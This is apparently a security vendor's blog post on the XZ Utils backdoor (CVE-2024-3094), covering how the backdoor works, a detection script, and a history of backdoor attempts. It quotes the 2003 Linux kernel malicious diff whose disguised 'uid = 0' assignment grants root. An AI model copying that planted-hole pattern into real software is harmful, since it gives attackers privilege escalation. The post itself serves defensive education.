The XZ Utils backdoor (CVE-2024-3094): Everything you need to know, and more

On March 28, 2024, a backdoor in the popular xz-utils package impacting the sshd binary was found and assigned CVE-2024-3094. Since then, the industry and community have produced a number of analyses and facts about this attack. While the situation is still developing, we now have a better collective understanding of how the attack took place and its impact.

This post provides the key points to be aware of. We take care of minimizing information duplication and instead curate a list of high-quality external references. Finally, as "what's old is new," we share a history of attempts to backdoor open source software—dating as far back as 49 years ago.

Key points and observations

On March 28, 2024, a backdoor was identified in the popular xz-utils package and reported to the oss-security@openwall mailing list one day later, on March 29. It was assigned CVE-2024-3094 and affects versions 5.6.0 and 5.6.1.
When infecting a system, the backdoor would change the behavior of the sshd binary and allow an attacker with knowledge of a specific private key to remotely execute arbitrary code on the machine.
The backdoor has been packaged in the several Linux distributions for several days:
- Fedora Linux 40 beta and Fedora Rawhide (see advisory)
- Debian unstable, testing, and experimental (see advisory)
- Kali Linux (see advisory)
- Arch Linux 2024.03.01, VM images 20240301.218094 to 20240315.221711 and container images created between and including 2024-02-24 and 2024-03-28 (see advisory)
- The full list of distributions embedding vulnerable versions can be found on Repology
To the best of the industry's knowledge, the backdoor has not been packaged in other widely used distributions such as Ubuntu or Amazon Linux.
The attack has attracted extensive industry and media coverage and is widely regarded as an advanced, multi-year, and likely state-sponsored operation.

How the backdoor works

When a malicious version of the xz-utils library is installed, a malicious shared object (SO) file is stored on disk. On Linux-based OSes, SO files are analogous to Windows DLLs.

The SSH server binary sshd is, like many binaries, dynamically linked. This causes it to load shared libraries from disk when it starts, by design. When sshd starts, it loads the malicious SO file from disk. This file contains the actual backdoor, which you'll see referred to as the "payload."

Under certain (common) conditions, the backdoor hijacks a specific OpenSSL function, RSA_public_decrypt. While the SSH server believes it's calling OpenSSL, it's actually calling the backdoor. The backdoor embeds a mechanism that allows an attacker with knowledge of a specific private SSH key to execute arbitrary code on the machine. It preserves usual functionality, so that SSH features keep working as usual, to stay under the radar.

External references and analysis

Below, we share external references you can pick from depending on what makes most sense for you to read about.

Reporting from mainstream media:

CERT advisories: CERT-EU, CISA, CIRCL-LU

"Historical" official references:

"Comprehensive" references:

FAQ on the xz-utils backdoor (CVE-2024-3094), by a Gentoo developer
Timeline of the xz open source attack
Everything I Know About the XZ Backdoor

OSINT analysis:

In-depth analysis of the backdoor and/or delivery mechanism:

Reproduction and open source:

Infographics:

https://infosec.exchange/@fr0gger/112189232773640259

Discussion and higher-level analysis:

How to check if you're affected

To check if a system is affected, you can run xz --version. If the output contains 5.6.0 or 5.6.1, it means you're likely running a backdoor version of xz.

As relying on a potentially backdoored binary isn't ideal, you can also use the detect_sh script that was shared on the OpenWall mailing list:

#! /bin/bash

set -eu

# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

# does it even exist?
if [ "$path" == "" ]
then
	echo probably not vulnerable
	exit
fi

# check for function signature
if hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
	echo probably vulnerable
else
	echo probably not vulnerable
fi

How Datadog can help

Datadog Cloud Security Management (CSM) customers can use CSM Vulnerabilities to identify any virtual machine or container that has been infected with the backdoor, using the query status:Open cve:CVE-2024-3094 (direct link).

Hovering your mouse over any affected virtual machine or container allows you to benefit from additional context such as the cloud account it's running in, operating system and misconfigurations that may affect it. It also enables you to easily pivot to observability data such as logs or network connections.

A host affected by a vulnerability (click to enlarge)

A history of backdooring attempts across the ages

While this supply chain attack on the XZ project is sophisticated and received extensive coverage, it's not the first time that actors have attempted (or succeeded) to backdoor software projects. When something big happens, it's always good to pause and look back. In this section, we tell a few stories from 1975 to 2023 that relate to attempts to backdoor legitimate code.

This list is not exhaustive, but it does showcase that attempts to backdoor code are not new and have taken a number of forms throughout the years. The CNCF TAG Security maintains a list of incidents that, while not comprehensive, catalogs the major events in supply chain security.

1975: The original "meta" backdoor

In 1984, Turing Award winner Ken Thompson published a paper entitled "Reflections on Trusting Trust", where he tells the story of how he had, nearly 10 years earlier, embedded a backdoor into a compiler and disassembler, making it impossible to track by auditing the source code or using the disassembler to examine the malicious machine code.

According to Thomson himself (through secondary research), his backdoor made it to the login command of Bell Labs' Unix Support Group, before being detected a few months later.

2003: The Linux Kernel

In 2003, an unknown actor published a malicious patch to a source control repository of the Linux Kernel:

--- GOOD        2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
                schedule();
                goto repeat;
        }
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
        retval = -ECHILD;
 end_wait4:
        current->state = TASK_RUNNING;

This backdoor would have allowed an attacker with knowledge of the 'options' mechanism to escalate their privileges to the root user on any affected system, due to the fake comparison of current->uid with 0 (which is actually a value assignment). Thankfully, maintainers of the kernel caught and removed the malicious code.

2012: The Ruby on Rails source code through a GitHub vulnerability

After discovering a vulnerability on GitHub, an individual was able to add their own public key to the popular Ruby on Rails GitHub repository by changing their user ID in an SSH key management feature to that of the targeted project. This addition was used to publish an unreviewed commit to the framework’s main branch. They also shared a write-up on how they had achieved this, while the vulnerability was still present. Additional analysis of this issue was provided by GitHub and a secondary researcher.

2021: The PHP source code

In March 2021, hackers breached an internal git server of the PHP source code and embedded a malicious change under the names of existing project maintainers. Had it not been caught, it would have allowed attackers to run arbitrary code in any PHP application accepting HTTP requests by providing a specifically crafted HTTP header User-Agentt (sic).

2021: Linux hypocrite commits

Still in 2021, researchers of the University of Minnesota embarked on a controversial (and at the time secret) research project entitled On the Feasibility of Stealthily Introducing Vulnerabilities in Open Source Software via Hypocrite Commits. They submitted a number of intentionally vulnerable or malicious patches and measured how many would be accepted in the stable branch.

Catch rate of Linux hypocrite commits (click to enlarge)

As can be seen from the table above, lots of their malicious changes did go through and ended up being reverted soon after by a maintainer.

2023: Fake Dependabot commits

In 2023, researchers identified a malicious actor attempting to pose as Dependabot, an application that keeps third-party dependencies up to date, in order to create malicious pull requests in hundreds of repositories. The malicious actor created falsified commit messages and inserted code to steal GitHub secrets and user passwords from victims using compromised contributor accounts.

Backdoors go beyond code

We've seen a few examples that backdoors in open source software go beyond the XZ story. But it's more than that: they go beyond software, as the following examples show:

As part of Operation Rubicon, the CIA backdoored encryption devices sold by the Switzerland-based company Crypto AG, starting as early as 1970. This was performed with full knowledge of the Swiss secret services, as outlined by a recent parliamentary report available in French and German.
The NSA has attempted to introduce an intentional backdoor in an RSA ciphersuite, Dual_EC_DRBG, so it could covertly decrypt communications secured with protocols such as SSL.
Documents from the Snowden case demonstrate that in 2013, the NSA had a $250M yearly budget to "insert vulnerabilities into commercial encryption systems, IT systems, networks, and endpoint communications devices."

Conclusion

The XZ backdoor is one of many publicly documented supply chain attacks—but it stands out for its complexity, both from a technical and human perspective, with the attacker having spent years preparing for the attack. Although the current consensus is that the campaign likely originates from a state-sponsored actor, there remain many unknowns about the attack. Security researchers will continue to investigate this threat for some time to come and will likely uncover more details about its nature and origins in the future.